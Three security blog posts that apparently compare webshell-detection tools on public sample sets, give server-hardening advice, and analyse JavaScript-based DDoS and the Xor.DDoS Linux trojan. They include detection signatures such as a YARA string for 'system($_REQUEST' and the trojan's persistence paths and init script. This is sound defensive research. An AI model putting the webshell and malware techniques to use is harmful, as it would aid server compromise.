We are back again with webshell topic as last blog post was warmly welcomed by our readers. At the beginning, I would like to say - sorry for the delay! We received a few messages asking for a continuation of this series. So, here we are, even such a long time in the IT world did not devalue our subject which seems to be still hot, referring to latest web trends or social media discussion. In this blog post I decided to perform more structured tests of several publicly available webshell detection tools.

Test details - sources

Some time ago Recorded Future published a great writeup on webshells. Two key takeaways were points discussing high popularity of webshells amongst Chinese criminals and continual development of new samples. It came as no surprise that a large number of samples in my data set seemed to be of Chinese origin.

I used the following, well known webshell repositories to create my own, testing superset:

A few comments are needed here. First three repos are a great collection of webshells, mostly written in PHP. I needed to clean-up the tennc repository a little bit by eliminating webshells that I was not interested in, and removing unrelated files like images, readme files etc. Stuff from irongeek.com was something that I found accidentally but I really liked it and decided to include five most recently added files in this research. Weevely (version 3.4) is a well-known webshell generation framework, that is also part of Kali Linux. As webshell agent code is polymorphic, I decided to generate fifty different samples to ensure good test coverage. Last, but not least, htshells had its own 15 minutes of fame about 3-4 years ago, although old-fashioned, it is still relevant nowadays. Just think, when was the last time you saw AllowOverride ALL? There are still many admins looking for advice how to turn it on. Thanks Tomi for bringing this to my attention!

Moving forward, when I was collecting samples I focused on specific file formats - the ones that are most popular and prevalent in the wild - ASP.net, JSP, PHP. Some of the files had .TXT extension or contained webshell code disguised as a JPG or GIF file. Moreover, I did not remove ColdFusion webshells. For shits and giggles, I left it as a non-popular type of webshell to see how tools would react. Some of them still can be spotted in the wild from time to time (1,2).

Overall size of entire collection was more than 1k files. Due to overlaps I needed to deduplicate some files by comparing their hashes, so please relax - no fail here:)

Test details - methodology

The overall detection rate was a primary objective for this test. This coefficient was a simple ratio of detected webshells against entire collection. Webshell detection variety (obfuscated/not obfuscated, programming languages, miscellaneous formats) was a second factor. Next on the list was a false positive ratio and final factor of this test - speed. For tools running under Linux/*nix, I used time command in order to measure the elapsed time. Speed was only measured for scenarios where full data set was used. Exception was OMENS which is a Windows tool, so it was tested on a different VM.

All above factors were a criteria for tools evaluation. Of course, I am aware that each tool is different and works in a distinct manner, but in the end all of them have the same objective - detect webshells. And that is exactly what was tested. I wanted to find the best tool in two categories: Overall detection with the smallest false positive ratio Overall PHP webshell detection with the smallest false positive ratio

At this point it is necessary to mention that for some tools documentation indicated that only specific file formats are supported. As a result I needed to create multiple tailored subsets of my initial data set. PHP webshells are the most popular type based on formats nowadays, hence majority of the webshell detection tools supports it. That is a reason for me to test how successful tools are on that field.

All tools were tested in the exact same way. Data sets were uploaded to server and then each tool was fired against them with default ruleset in the following scenarios:

Shell Detector
- All sources (1107)
- Only PHP webshells (560)
LOKI
- All sources (1107)
- Only PHP webshells (560)
PHP-malware-finder
- All sources (1107)
- Only PHP webshells (560)
- PHP webshells + PHP valid files (560 + 2480)
OMENS
- All sources (1107)
- All sources + valid files (1107 + 4187)

NOTE: “valid files” represents the same collection of random files used in part 3.

Without a further ado, I hope all is clear now and we can start reviewing test results!

Shell Detector

I started with our old friend, Shell Detector. As you may remember, last time it was not our contest winner, but I wanted to test it as it is still being mentioned in many webshell detection writeups.

Shell Detector marks files as suspicious and webshells - it is worth to mention that webshells are also marked as suspicious files (double tag)! I focused only on webshells tag - suspicious was too wide (many false positives) as it was presented last time.

And what were the results? Only 1 out of every 5 files was recognized. Even if I tested only PHP/ASP files, it stayed on the same level of detection. The execution time of a process also was not satisfying - 5 minutes and 16 seconds.

LOKI

Second tool in our test should be also familiar to you. LOKI did very well in the previous part of this series and I expected good results also this time. Not wasting your precious time, let’s jump to test results:

Honestly, I was surprised that it did not perform so well as I expected. Detection ratio around 60% is NOT a bad score but I was hoping for a much better results based on the previous test. Not this time. Please remember that I only used default rulesets provided by each tool.

Analysis of the results gave me a few interesting observations. First of all, LOKI did not detect htshells. The absence of detection of these webshells was caused by lack of relevant rules. The situation was a little bit different for Weevely backdoor agents. None of the fifty agents were detected despite the existence of a dedicated rule in the thor-webshell.yar ruleset. I must mention here that this rule was created back in 2014 and it’s no longer applicable to Weevely 3.x PHP agents (it works just fine for older versions, e.g. 1.1). Additionally, it had a problem with the PHP files from the caidao-shell repository which includes different types of China Chopper webshells and clients. Last but not least, I observed that LOKI had problems with obfuscated files. It was easily observed in results for PHP-backdoors repository where I noticed only a few hits.

Another part of tests was a false positive ratio. Once again I can say that LOKI was able to overcome this challenge. I tested it twice with two different groups of valid files, both attempts were successful as I did not get any false positives.

Execution time - 39 seconds - was the best out of all tested tools.

PHP-malware-finder

And now, I would like to warmly welcome a newcomer to our series - PHP-malware-finder! I learned about it from its authors on Twitter - thank you very much!

@dfir_it Hello! We read your articles about Webshell and wondered if you would like to test our detection tool: https://t.co/xCM57EiRGx
— nbs_system (@nbs_system) August 23, 2016

It goes without saying, I was happy to test it. Although, before I move to test results I would like to briefly introduce you to this tool. From Github page:

Detection is performed by crawling the filesystem and testing files against a set of YARA rules. Yes, it’s that simple!.

YARA plus effective rules sounded like a good recipe for decent results in our tests. In addition, authors mentioned a few features which can increase detection of obfuscated files. It all gave me hope for a high percentage of detection.

How does it look like when executed? The user is presented with a simple output without too many details explaining reason for detection - just short information which YARA rules fired (eg. DodgyPhp) or if file was suspiciously short (TooShort):

root@kali:~#./phpmalwarefinder ../../../webshell_all/ > ../../../output_phpmalwarefinder
TooShort ../../../webshell_all/PHP-backdoors/Obfuscated/CWShell_c9a5115093caa2ce9411df1111a76ffd591dd4a4.php
TooShort ../../../webshell_all/PHP-backdoors/Obfuscated/DKShell_25d8e17abfa70370ab64ccc1f2e753a9082e8b7e.php
TooShort ../../../webshell_all/PHP-backdoors/Obfuscated/r00tshell_6dc8b59781183d4061990b8b0fdb617063b8677d.php
TooShort ../../../webshell_all/PHP-backdoors/Obfuscated/WSOShell_7b7394a01b0d5b2cf0477f3d01cbf9226fb7b2b4.php
TooShort ../../../webshell_all/php-webshells/hiddens shell v1.php
DodgyStrings ../../../webshell_all//public-shell/devilzShell.php
Websites ../../../webshell_all//public-shell/devilzShell.php
DodgyPhp ../../../webshell_all//public-shell/devilzShell.php
DangerousPhp ../../../webshell_all//public-shell/devilzShell.php
SuspiciousEncoding ../../../webshell_all//public-shell/WSO.php

I noticed a few things that might be noteworthy:

Verbose mode. It executes YARA with “-s” option (print matching strings). Output is not formated and, as a result, not very readable.
Fast mode. Again it uses another YARA functionality (-f, fast scan). Fast mode stops searching for strings when they were already found. In fast mode you won’t see all occurrences of the string in YARA’s output when using verbose mode, just the first one will appear. In our test, it was not game changer - scan took only one second less.
Results. There appears to be a small thing when printing system paths. As you can see on listing above I added a slash symbol (/) at the end of the path where all webshells were uploaded. That slash sign was replicated at last once in some of the results. This is a result of the method in which YARA combines strings. It generated stealthy updates when I used sort and uniq tools. This might also affect your workflow if you plan to integrate this tool with alerting systems (e.g. SIEM). Be careful!

TooShort ../../../webshell_all/webshell/php/h6ss.php
ObfuscatedPhp ../../../webshell_all//webshell/php/h6ss.php

Let’s move on to our test and check the PHP-malware-finder!

As you can observe, PHP-malware-finder(PMF) achieved better results than LOKI. I need to mention here that to perform full test with PMF I had to execute it twice and select language (-l switch) to either PHP or ASP. The reason for that was the way PMF process rules. When used with -l switch, tool process suspected file with php.yar or asp.yar respectively. First rule in both files is a global private rule and checks whether the file format is compatible with the user choice. If not, processing of the file stops at this point, it is because of the way how global rules work. Ultimately, I merged the outputs to receive final result.

Regarding the result from PHP testset, I was super glad - big WOW! Almost 80% looked really good. There was space for improvement, but that was something I considered as a really promising foundation for further development. Much better than LOKI with default YARA ruleset. One more thing was false positive rate level. It was extremely low and could be tolerant in production.

I expected execution time to be close to LOKI as detection methods of both tools are similar. As it sometimes happens, reality does not always meet expectations. PHP-malware-finder, when executed without any additional switches, needed 1 minute and 41 seconds to complete the scan

OMENS

Next debut here! Yet again I learned about this tool from Twitter (I love social media!).

@lennyzeltser @maridegrazia @dfir_it if you get a chance checkout *OMENS*. I'm kinda partial to it ;)https://t.co/dMlbWYyPei
— Quix0te (@OMENScan) July 8, 2016

Of course, I tested it with pleasure!

OMENS is free and closed source. Author explains reason for this decision. Even though I am personally a fan of open source tools, I can think of various reasons for making such choice and I respect that. For more information about this tool I recommend you to read official documentation.

I am happy to see a dedicated tool for Windows OS, as most of the available tools focus on *nix systems. Output looks pretty nice. It contains detailed information about each hit, including full path to an affected file plus information which files were added since the last scan. Below is a sample output:

(New) C:\Inetpub\wwwroot\webshell_all\irongeek\content.gif
  (eval() Signature Found in file: C:\Inetpub\wwwroot\webshell_all\irongeek\content.gif
   + Possible BackDoor script or exploitable unsanitized input function

  (base64_decode() Signature Found in file: C:\Inetpub\wwwroot\webshell_all\irongeek\content.gif
   + Known BackDoor script delivery mechanism

(New) C:\Inetpub\wwwroot\webshell_all\PHP-backdoors\Deobfuscated\1n73ctionShell_abc00305dcfabe889507832e7385af937b94350d.php
  (default_action*FilesMan) Signature Found in file: C:\Inetpub\wwwroot\webshell_all\PHP-backdoors\Deobfuscated\1n73ctionShell_abc00305dcfabe889507832e7385af937b94350d.php
   + Known BackDoor script signature

Another handy feature allows to generate a result file named BadHTML.log. It lists all files marked as suspicious and can be easily used as input to other programs/devices for further analysis or to block traffic.

Final results from test:

Detection ratio from all sources was similar to YARA based tools - 56%. Problem appeared with high false positive rates - more than 8%. Documentation doesn’t provide any information about limitation of supported file formats, so high FPs ratio likely was not an effect of badly composed testing set. Unfortunately, this feature can cause a lot of hassle for people tasked with reviewing alerts. According to our goals, I performed one additional test with only PHP files:

The results were similar to first test. Good detection rate but high level of false positives - 9,52%. In my opinion it is not feasible to maintain a production tool with so high false positive ratio. I would recommend this tool if it was possible to easily edit signatures which would allow me to tuning these generating a large amount of FPs and creating new ones to enhance the level of detection. Unfortunately, OMENS in its current shape does not allow these kind of changes.

As it was told at the beginning of this post, I did not test speed of scanning for that tool.

“Better Together”

The subtitle of this part is not accidental. (I named it after Jack Johnson’s song). Right after my tests were completed, I started thinking how to improve overall detection score to be higher than 90%. Two projects use YARA so naturally, I decided to combine databases of both tools and see if it is going to help.

At the beginning, I compared test results from both tools to see how many detected webshells were not visible by another. The output files from LOKI and PHP-malware-finder were formatted to contain only sorted full paths of matched files. Next I searched for the differences between two files:

awk  'NR==FNR {a[$1]=$1; next}!($1 in a) {print $0}' Loki_result PHP-malware-finder_result
awk  'NR==FNR {a[$1]=$1; next}!($1 in a) {print $0}' PHP-malware-finder_result Loki_result

As soon as I saw result that operation I just wanted to leave for my favourite bar and get a glass of something good. You may asked me why I was so happy. Short answer to that question is a very long list of differences between both files. When I merged the results I got 82.2% detection rate (910 webshells detected). Huge improvement achieved. It was not perfect but it still left me with some tricks up my sleeve to increase the overall ratio by adding new YARA rules.

Let’s put it all together in one tool. I decided to use LOKI mostly because of scanning speed and logging enabled by default. I copied .yar files to LOKI’s signature-base/yara/ directory and started testing. As you can imagine it is never that simple. Story of my life. It was not different this time. Both tools use YARA but are build in a different way so there were a few changes that I needed to apply:

I removed whitelist checks - pretty nice feature but I decided it would be too big hassle to move it to LOKI
One of the rules in the file bad_php.yar contained a small error in regular expression. I corrected the Misc rule by adding a closing bracket: $chmod = /chmod\s*(.*777)/
I needed to remove two global private rules from asp.yar and php.yar. Both were affecting scanning of files that did not match PHP or ASP characteristics and thus impacting final results.

And now is the best part, after resolving problems from above list, our detection ratio increased! 968 shells and 87.44% accuracy achieved by LOKI. I tested also PHP-malware-finder with last two changes and I noticed much better results than before:

These results were really good, but still it was not our last word!

Do you remember a ruleset with modification from last part of this series ? Yes, now it was the time to play that card. I did not expect too much, because actual detection ratio was high, but I was not disappointed and I got another three matches, so at that point I had 971 findings (495 findings for PHP files - 88.39%).

Naturally, main question came to my mind: “What files are still not cover ?!”

Time to answer that question. I had a list of 136 files not detected. Statistical analysis of the results based on formats showed that most undetected extension was PHP - 65 matches, but it worth to mention that if we consider proportion of tested files to undetected files also based on format then ASP will be on first place - 43 out of 141 files, gives 30,5% undetected ratio. Moreover, TXT files (7 matches in total - 3 PHP, 2 ASP and 2 JSP content inside), one example of ColdFusion and htaccess shell (I was positively surprised!) were still undetected. Additionally, I examined relation between obfuscated and non-obfuscated PHP files (including three hiding behind TXT extension) from collection of undetected files. The graph below present the results:

A little deeper look at results gave me a few observations what was not detected. Take a closer look at details:

many Unknown shells from PHP-backdoors repo (mostly obfuscated)
three variants of MailerShell (also PHP-backdoors)
a few files related to caidao-shell (tennc/webshell repo)
a few files from collection of drag library scripts (tennc/webshell/drag repo)
a few WAF bypass files (bypass-waf-$date format from tennc/webshell/php repo)

I would like to go into more details but it is material for different article where I could analyse step by step why these files were undetectable. However, I hope that all above analysis will be a good source for developers tested tools.

Conclusion

One sentence to sum up all the above. Do not give up, my blue team friends! Though none of the tested tools achieved 100% success rate, everybody knows and agrees that detection tools cannot be the only layer in your defence strategy. It is something, I have touched upon in the last part of this series. Even though, in this post I have highlighted limitations and weaknesses of some tools, my hope is to not discourage anyone from developing and improving community toolset. It is a continual process and learning from each other hopefully helps to make the difference, at the end of the day. Positive result of this research is the fact that by sharing experience and combining work of people from different companies, backgrounds and projects, we can bring tangible benefits to all of us.

Gold medal goes to COOPERATION! As always - keep fighting! Keep defending!

PS. If you write YARA rules for your own use, consider sharing with community and submit them to YaraRules Project.

Webshells - Every Time the Same Story…(Part 3)

2016-07-06T14:26:13+02:00

Last blog post in this series described the analysis of the attack with the use of webshells. Such attacks showed how difficult it is to ensure the security of the entire infrastructure to defend against them. This part focuses on the evaluation of available tools and providing prevention and mitigation recommendations.

Webshell detection tools

I have evaluated the following projects focusing on webshells detection:

These tools were tested against the files presented in part 1 with addition of a few new ones:

byroe.jpg - webshell hide in an image file
myluph.php - example of PHP webshell
webshell.php - simple PHP webshell presented in part 1
vero.txt - PHP webshell containing both “clean” and obfuscated PHP code
myluphdecoded.php - decoded file myluph.php
China Chopper - ASPX chinachopper.aspx and PHP version chinachopper.php
c99madshell.php - popular C99 webshell
unknownPHP.php - shared by Bart in his blog post

The conducted tests verified the detection accuracy of all tools when faced with a combination of different webshells mixed with hundreds of valid files from GitHub repositories and other public sources:

index.html from different popular websites
ASPX files
PHP files
JavaScript files

NeoPI

At first, I tested NeoPI. According to project’s GitHub page, NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content. Below output presents result of running a tool against a set of aforementioned files:


[[ Total files scanned: 4323 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 16.773207 seconds ]]

[[ Average IC for Search ]]
0.0762022597838

[[ Top 10 lowest IC files ]]
  0.0153        ../webshell_db_short/myluph.php<
  0.0168        ../webshell_db_short/vero.txt
  0.0202        ../webshell_db_short/unknownPHP.php
  0.0248        ../webshell_db_short/phpcollection/2.php
  0.0262        ../webshell_db_short/myluphdecoded.php
  0.0268        ../webshell_db_short/phpcollection/wkv3.php
  0.0270        ../webshell_db_short/china.aspx
  0.0284        ../webshell_db_short/phpcollection/agenda.ics.php
  0.0285        ../webshell_db_short/phpcollection/config.xml.php
  0.0289        ../webshell_db_short/phpcollection/uploads.php

[[ Top 10 entropic files for a given search ]]
  6.2409        ../webshell_db_short/phpcollection/phpmailer.lang-zh.php
  6.2355        ../webshell_db_short/phpcollection/phpmailer.lang-zh_cn.php
  6.1932        ../webshell_db_short/unknownPHP.php
  6.1622        ../webshell_db_short/phpcollection/phpmailer.lang-ch.php
  6.0307        ../webshell_db_short/vero.txt
  6.0258        ../webshell_db_short/myluph.php
  6.0151        ../webshell_db_short/phpcollection/phpmailer.lang-ko.php
  5.9169        ../webshell_db_short/phpcollection/phpmailer.lang-ja.php
  5.7736        ../webshell_db_short/phpcollection/1.php
  5.7393        ../webshell_db_short/phpcollection/phpmailer.lang-vi.php

[[ Top 10 longest word files ]]
  554750        ../webshell_db_short/phpcollection/wkv3.php
   11999        ../webshell_db_short/phpcollection/full_dump.php
   11999        ../webshell_db_short/phpcollection/contentobjects.php
    1774        ../webshell_db_short/myluph.php
     660        ../webshell_db_short/vero.txt
     641        ../webshell_db_short/c99shell.php
     547        ../webshell_db_short/phpcollection/EmailAddressValidator.php
     356        ../webshell_db_short/phpcollection/priv.txt
     197        ../webshell_db_short/phpcollection/emission.xml (2).php
     197        ../webshell_db_short/phpcollection/emission.xml.php

[[ Top 10 signature match counts ]]
      85        ../webshell_db_short/c99shell.php
      35        ../webshell_db_short/phpcollection/run-tests.php
      27        ../webshell_db_short/phpcollection/WikiComments.aspx
      24        ../webshell_db_short/phpcollection/MemberSearch.aspx
      22        ../webshell_db_short/phpcollection/CustomPageManagement.aspx
      22        ../webshell_db_short/phpcollection/Comments.aspx
      20        ../webshell_db_short/phpcollection/phpmailerTest.php
      20        ../webshell_db_short/phpcollection/ManageTerms.aspx
      20        ../webshell_db_short/phpcollection/TimestampIntegrationTest.php
      17        ../webshell_db_short/byroe.jpg

[[ Top cumulative ranked files ]]
      56        ../webshell_db_short/myluph.php
      57        ../webshell_db_short/vero.txt
     176        ../webshell_db_short/c99shell.php
     219        ../webshell_db_short/phpcollection/wkv3.php
     225        ../webshell_db_short/phpcollection/1.php
     372        ../webshell_db_short/myluphdecoded.php
     444        ../webshell_db_short/phpcollection/profile.php
     525        ../webshell_db_short/phpcollection/WikiComments.aspx
     570        ../webshell_db_short/phpcollection/uploadpostattachment.aspx
     595        ../webshell_db_short/phpcollection/Fields.aspx

Pros:

detection ratio: 6 out of 9 webshell files
successful detection of clean and obfuscated code of the same webshell
the more complex code structure is, the better results and detection ratio
various methodologies to detect webshells - signatures, index of coincidence (IC), ratio, entropy, longest keyword matching

Cons:

failed detection of simple one-line webshells (e.g. China Chopper)
false negatives and positives in different categories, including final rankings
manual triage and additional analysis of the highlighted files is required for some of the methodologies (e.g. entropy, keyword matching)
signature database is outdated as the project appears to be not developed anymore
webshells hidden inside of another file format (byroe.jpg) will be not detected in wide spectrum of files - NeoIP produce massive false positive

I’ve noticed it would be really helpful to combine summary information about a files detected by more than one heuristic. For instance in my test byroe.jpg was visible in top ten signature matches, longest word and entropy but not in Top cumulative ranked files.

Taking into account that NeoPI wasn’t updated for last 4 years, didn’t detect all types of webshells, generated number of false negatives, it still had quite impressive detection rates of a relatively new webshell samples. I can recommend adding NeoIP to webshell analysis toolbox. InfoSec Institute has a nice write-up on NeoIP with some additional details.

Shell Detector

Shell Detector was a second tool that I have evaluated. I really liked how the results were presented in console:

There is also a web version available here.

Pros:

detection ratio: 7 out of 9 webshell files (5 as suspicious + 2 webshell)
successful detection of clean and obfuscated code of the same webshell.
provided final results in clear graphical form

Cons:

131 false positives based on suspicious word existence
only signature based detection
webshell signature database out of date
sluggish interface when number of results is too high (Web version)
signature database is written in serialized php format (not scalable)
byroe.jpg was not detected by Shell Detector - not support JPG files

To sum up even though the signature database file appears to be out of date the tool correctly determined almost all files to be malicious. This tool can provide powerful detection capability as long as signature database is kept up to date.

LOKI

LOKI presents scan results in a terminal, coloring entries depending on their severity. It also outputs all matches to a single log file. The rules are written in YARA, easy to use yet very powerful language to identify and classify malware which appears to be a tool of choice by the security industry. According to project’s website most effective rules were borrowed from the rule sets of his bigger brother THOR APT Scanner. For me, the most interesting were the ones dedicated to webshells detection.

My first scan of a sample set with a default signature database showed moderate detection ratio (5/9). With YARA growing popularity among infosec world, it’s possible to build and maintain a powerful database to hunt malware including webshells and research new obfuscation techniques and variants observed in the wild. Taking that into account, I decided to improve the results obtained previously. I found set of rules, that almost perfectly match my expectation. After a quick adjustment, final score was close to ideal - ratio (8/9). It were really a tiny changes, so I’ll shortly describe it:

Change $php parameter to “ in new rule created based on misc_php_exploits

Add “system($_REQUEST” in misc_php_exploits and newly created rule from point above

Remove two strings in rule misc_shells - $s6 and $s8 (that one was even marked with a comment that it could generate FP, so it was easy ;)

After all of that, as a result I received the biggest advantage of LOKI - false positive number was zero!

Pros:

detection ratio: 8 out of 9 webshell files

successful detection of clean and obfuscated code of the same webshell.

provided final results in clear log file

zero false positives(but that really depends on Yara rule set you use)

easy to develop signatures based on Yara rule

supports all extensions

Cons:

only signature based detection for webshells

Summary

To sum up the results from all the tools, it’s really hard task to develop one tool which will mark with good accuracy webshells as suspicious. It’s because there is a wide range of different functions, methods, encodings which would be use to achieve the same effect. Attackers don’t need to use base64_decode function to decode their base64 code. Instead, they can add their own proprietary function to do exactly that. They can use a string lookup array to avoid keyword-based detection or invoke function names by string with str_replace and much more. Imperva did a great research describing various teqchniques in their blog post.

The only webshell not detected by LOKI was unknownPHP.php which obfuscation technique is really advanced - thanks to Darryl from Kahu Security, you can follow the decoding process in a great post. As its not possible to detect it using general signature rules, NeoPI methods (entropy, Index of Coincidence) are an excellent solution for this kind of backdoors. Together with LOKI, it seems to be a powerful weapon to detect webshells.

Prevention and mitigation

There are a few things that can be done to protect organizations against a server compromises:

PATCH! - it sounds silly, because it seems SO obvious but last year showed that even a well-known attack like Heartbleed doesn’t guarantee that administrators do their job. Two months after the public release, there were still around 300k vulnerable servers

harden your web server - implement a least-privileges policy on the web server, limit script execution permissions in specific locations etc.

deploy DMZ (demilitarized zone) - enable logging of allowed and blocked traffic, limit interaction between DMZ and your production environment

deploy reverse proxy with WAF (Web Application Firewall) - restrict accessible URL paths for only legitimate sources using for example free Mod-Security or other comercial product, consider fuzzy hash matching

regular test your environment - conduct virus signature(e.g. use by WAF) checks, application fuzzing, code reviews and server network analysis

regular test system and application - regularly check the application’s security - pentest and vulnerability scans to establish areas of risk

versioning + backup - establish offline a “well-known good” backup all critical servers, enable monitoring for changes to have clear history on servers

user validation - employ user input validation to restrict local and remote file inclusion vulnerabilities

scan all incoming files to web server (if you accepting file upload from users) - as it was shown before, the administrator can not trust the extensions of the files, all of this could be just a trick to hide malware

always follow up social media discussion!;)

When #ThreatHunting try and define a narrow scope of what you are looking for. I have a thing for webshells lately so… #DFIR 1/8
— Jack Crook (@jackcr) May 10, 2016

Look at processes that are spawned by the owner of the webserver process #DFIR 4/8
— Jack Crook (@jackcr) May 10, 2016

Look at POST requests with no referrer and a 200 response code #DFIR 5/8
— Jack Crook (@jackcr) May 10, 2016

Look for POST requests to new directory paths and filenames with a 200 response code #DFIR 6/8
— Jack Crook (@jackcr) May 10, 2016

Community also has its own ideas:

@jackcr baseline the web server/ app error logs. Focus on exceptions about previously not seen file names e.g -> https://t.co/gIOFcE6wgI
— dfir_it (@dfir_it) May 10, 2016

@jackcr File: size, ext, owner, location, content. Request: UA, URI/params, internal 2 internal, interval/duration/size of requests
— Glenn (@hiddenillusion) May 10, 2016

AV/HIDS scan of the web server…

Let me digress a little about the last recommendation. First of all, as you know, AV is not a fail-safe mechanism, so you cannot trust it fully. AV products do not protect against all types of attack vectors. It is relatively easy to bypass AV. As a result, you can at least block known malicious code (detected by signatures or heuristics) - not ideal but still an advantage.

When you’ve got AV on your web server (or any other machine for that matter) you need to know that there are costs involved:

introduce additional risk to your machine by adding code which could be vulnerable to different type of attacks like RCE, local priviliges escalation, sandbox escape, etc. Details can be found on Joxean Koret’s presentation or Google Project Zero posts (1, 2)

performance - every AV generate some efficiency loss, it is periodically measured and reported by AV-Comparatives organization - lastest can be found here

Conclusion

The whole series was intended to familiarize you with how popular, diverse and at the same time dangerous are attacks leveraging webshells. As the second part of this series showed, crooks aim was targeting specific companies and webshells are only a small part of bigger plan. Variety, diversity and simplicity of webshells causes the defense against them to be a very difficult task. Even if you fill all the recommendations of the section “prevention and mitigation” does not guarantee that your application/environment is 100% safe, but it is important to build security in a comprehensive manner and to leave as little space as possible to beat our “entanglements” ;) Keep fighting! Keep defending!

DDoS - Not a Simple Flood Anymore

2016-02-04T11:39:48+01:00

Everything changes, that’s obvious. The same rule applies to DDoS (Distributed Denial of Service) attacks. At the beginning, it was a simple flood which main purpose was to overwhelm destination machine’s resources or saturate the capacity of network link. Let me present how situation has changed over several last years.

JavaScript DDoS - scary monster from China…

At the end of March last year, news about big DDoS attack against Github hit the media. Many security researchers started analysing, what type of attack generated such amount of traffic directed to github.com. After few days Netresec released a blog post describing what exactly has happened.

Long story short:

An innocent user opens a website that uses Baidu analytics.

After visiting the website, the browser loads/requests Baidu Analytics JavaScript code (which serves similar purpose as Google Analytics).

The web browser’s request for the Baidu JavaScript is intercepted by the Great Cannon.

A fake response is injected by Great Cannon (using China Unicom infrastructure confirmed by Robert Graham) instead of the actual Baidu Analytics script. This fake response is a malicious JavaScript that tells the user’s browser to continuously reload two specific pages on GitHub.com.

The important thing to note is that not all requests were answered by the Great Cannon. As reported by Google number of requests varied between 6% at the beginning of the attack with maximum spikes reaching 17,5% of traffic destined to baidu.com. That was a huge number taking into account how many Asian websites are using Baidu Analytics. The whole campaign was well planned and executed.

Above situation with Great Firewall of China was a good example of JavaScript-based DDoS triggered by man-in-the-middle attack. Take a look at below drawing showing that method.

Volumes of such attacks are related to popularity of the domain. The more requests intercepted the larger DDOS attack would be generated. Another variation might be achieved by injecting malicious JavaScript in HTTP responses intercepted by open proxies.

Prevention (encryption -> HTTP is over)

To prevent this kind of injection you can block JavaScript in your web browser using popular add-on NoScript. That’s protection from client point of view, but what administrators could do for their users ? They SHOULD start using SSL ;).

You may remember our rant about Confidence 2015 conference and how we were a little bit disappointed with the talks. Guess what, there was one shining star! It was presentation done by Jim Manico. Not exactly a rocket science but I exactly remember his main motto: HTTP is over! Time to switch to HTTPS!

I fully agree with Jim. There is no excuse to serve HTTP content which could be easily intercepted and modified. If you want to be regarded as a trusted and safe partner on the market, you need to launch HTTPS. For many small business new chance is just around the corner - Let’s Encrypt project is approaching a final phase. It’s a great opportunity to make the Web a safer place. No more excuse regarding performance which is briefly explained here, dispelling few myths. In short, TLS features plus new version of HTTP standard, HTTP/2, should resolve all your concerns in this matter.

Other types of JavaScript DDoS

Unfortunately, encrypting traffic will not resolve other types of JavaScript-based DDoS attack. There are two scenarios, I would like to mention here.

First situation is when the user requests a valid JavaScript file, but in response receives malicious JavaScript, which was replaced on the compromised server. It’s a tough case, because from user point of view, he/she cannot expect that valid source will serve malicious content.

Secondly, nowadays many web developers would like to speed up the development process by using third party libraries instead of writing own code. Of course, this solution has many advantages (i.e. saves time and money), but it also adds additional code that is outside of control.

In September 2014, RiskIQ reported that jQuery.com’s website was compromised. jQuery is one of the most popular JavaScript library (around 30% of all websites using some version of it as of 2014). As a part of this attack it could have easily been replaced with a malicious one and infect millions of webpages using that lib. This kind of attack is no longer theoretical but a real danger.

So in both cases described above, simply by navigating to a legitimate web page your computer can become a part of DDoS attack. I recommend blocking JavaScript execution in your web browser by default. It’s better to have full control on what executes on your computer ;)

P.S. It was not a first incident where Great Firewall of China was involved and I’m sure that it was not last.

XOR DDoS - malware not only knocks out the “window”…

Late summer last year, you could read few notes (1,2) or thread advisory regarding Linux trojan named Xor.DDoS, using infected machines in different DDoS campaigns. It was researched by MalwareMustDie team two years ago. The name stems from the heavy usage of XOR encryption in both malware and network communication to the C&Cs.

Infection:

Attackers use the following vectors to infect machines:

one-liner shell script being injected via ssh connection (Shellshock in use)

brute force weak root password

exploit a vulnerable service running on victim machine

Brief analysis:

Malware copies itself to the following files:

/boot/<10 random alphanumeric chars>

/lib/udev

The malware sets the following permissions on the created files:

1 2 3
-rwxr-x--- 1 root root 13 Nov 15 11:46 /etc/init.d/ghfghfgetz -r-------- 1 root root 13 Nov 15 11:56 /lib/udev/udev

To ensure persistence, the malware executes processes to determine if the main process is still running. If not, it creates and executes a new copy in /boot. The process is hidden using common techniques like masking itself using the name of a common Linux tool like top etc.

1 2
root@kali:/boot# ps aux | grep 2371 | grep -v grep root 2371 0.0 0.0 12312 276 ? Ssl 11:34 0:02 top

That’s only a small piece of all actions done by this malware - MMD team has a very detailed analysis on their blog.

Moreover, in the middle of last year the same team discovered that XoR.DDoS used an iptabLes|x strategy in their infection process - take a look at paragraph “Linux/killfile” ELF (downloader, kills processes & runs etc malware).

For persistence the malware creates an init.d script with random name. Run the following command to check for the presence of the script:

1 2 3 4 5 6
root@kali:/boot# ls -la /etc/init.d/ | egrep -i “ [a-z]{10}$” -rwxr-x--- 1 root root 13 Nov 15 11:46 ghfghfgetz root@kali:/boot# cat /etc/init.d/ghfghfgetz #!/bin/sh /boot/ghfghfgetz

File itself is a non-stripped ELF, written in C language. It is a nice example of well-written executable malware to infect multi-platform Linux environments with multiple persistence mechanisms. It is not as typical DDoS bot written in a high-level scripting language like Perl or PHP with really straightforward operations.

The IP addresses it would communicate with were encoded into binary. When it called into action then affected server start flooding victim IP.

Attack scenarios

One of them (using brute force campaign as an initial step) was described by FireEye in blog post at the beginning of last year.

In short, whole campaign was focused on gaining access to servers around the world. Part of the attack was targeted at FireEye’s global threat research network (honeynet). It’s worth to mention that it was really extensive campaign - in three months each server (from FireEye network) logged nearly ONE million login attempts!

If root access was obtained then attackers IPs (103.41.124.0/24) would log out and stop any further activity. In the next 24 hours another IP accessed the server and would run a SSH remote command (openSSH feature - multiple shell commands, separated by semi-colons). The malware extracted kernel headers and version strings from victim server and prepared customized malware on a separate build server. Whole process worked against hash signature-based mechanism. If there was a problem with building proper version then it used pre-build solution.

Main purpose of this campaign was to infect as much servers as possible with the XoR.DDoS malware and use it in DDoS attacks. Few of them were observed by Akamai SIRT and presented in their threat advisory. Attack generated by XoR.DDoS botnet ranged from a few Gbps to 150+ Gbps mostly in gaming business. To imagine how huge volume was generated compare it to North Korea’s total bandwidth. Incapsula’s security researcher, Ofer Gayer, estimated at the end of 2014 that at around 2.5 Gbps, so the attack generated by XoR.DDoS was 60 times or more bigger than total country traffic!

Conclusion

The material presented above, shows how much DDoS business has changed. Attackers are looking for new different methods to generate high volume distributed attacks like:

sophisticated malware

trusted infrastructure as a carrier of command for innocent users

new protocol where reflection attack is possible.

You could say that developing itself is nothing new and that’s true, but the scale of this phenomenon is much greater and people who work on it are much more advanced and well prepared (at various levels - skills, organization, marketing). It gives the conviction that a group of people responsible for DDOS attacks and their capability grows rapidly.

